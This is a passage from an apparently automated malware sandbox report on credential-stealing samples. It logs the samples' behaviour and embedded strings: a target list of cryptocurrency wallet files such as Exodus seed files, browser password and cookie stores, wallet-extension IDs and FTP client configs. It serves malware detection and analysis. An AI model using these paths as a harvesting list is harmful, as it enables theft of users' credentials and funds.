Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Tries to harvest and steal Bitcoin Wallet information
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                                      Tries to harvest and steal browser information (history, passwords, etc)
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                      Tries to harvest and steal ftp login credentials
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                      Tries to steal Crypto Currency Wallets
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
